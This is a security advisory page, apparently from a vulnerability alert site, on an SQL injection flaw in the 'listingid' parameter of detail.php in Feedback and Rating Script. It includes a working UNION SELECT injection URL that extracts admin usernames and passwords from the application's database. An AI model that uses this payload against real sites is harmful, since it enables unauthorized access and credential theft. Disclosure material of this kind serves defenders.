Vulnerability details :
 
Feedback and Rating Script detail.php listingid Parameter SQL Injection 
 
     Fiche

Fiche créée le 2008-05-16 03:21:29, dernière mise à jour le 2009-10-23 05:58:53

Feedback and Rating Script contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'detail.php' script not properly sanitizing user-supplied input to the 'listingid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.


http://[target]/detail.php?listingid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x757365726E616D653A20,username,0x70617373776F72643A,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/auto_admin_settings_tb/**/LIMIT 0,1/*
 
 
 
External refs :
OSVDB  45213
 
 
 
 

 
 


Free consultation (search)
 
  Fill one or some of the fields below :
   
Vendor
 
Title
 
Vulnerability ref.
 
 
   
 
   
Individual alerts
 
You determine with one profile dynamic and assisted, all your material and software equipment.
We shall inform you then automatically, as soon as a notification of security will concern one or several elements of it profile.
Every notification is definite, consists of numerous information to determine risk and to protect itself from it.
 
Login:
Pass:
 
Free online subscription
© Power4Security.com - BMS Ltd UK 2007-2008 - powered by Power4Website.com
Partenaires : Anti-spam - Hébergement France - MySQL Php Suisse - Hosting Canada - Web Php Maroc - WebmasterMalin
Guide de l'affiliation - Guide du paiement électronique et de l'e-currency - Annuaire du Web - Solution e-commerce - Externalisation et outsourcing
e-Marketing et e-Mailing - Comparaison de services - Comparateur Marchands - Bons plans par email - Tests de personnalité et de QI
SMS API - Forums et Petites Annonces Gratuites - Rencontres - Sonneries - Offres du Web - Arrêter de fumer - Guide des mobiles et PDA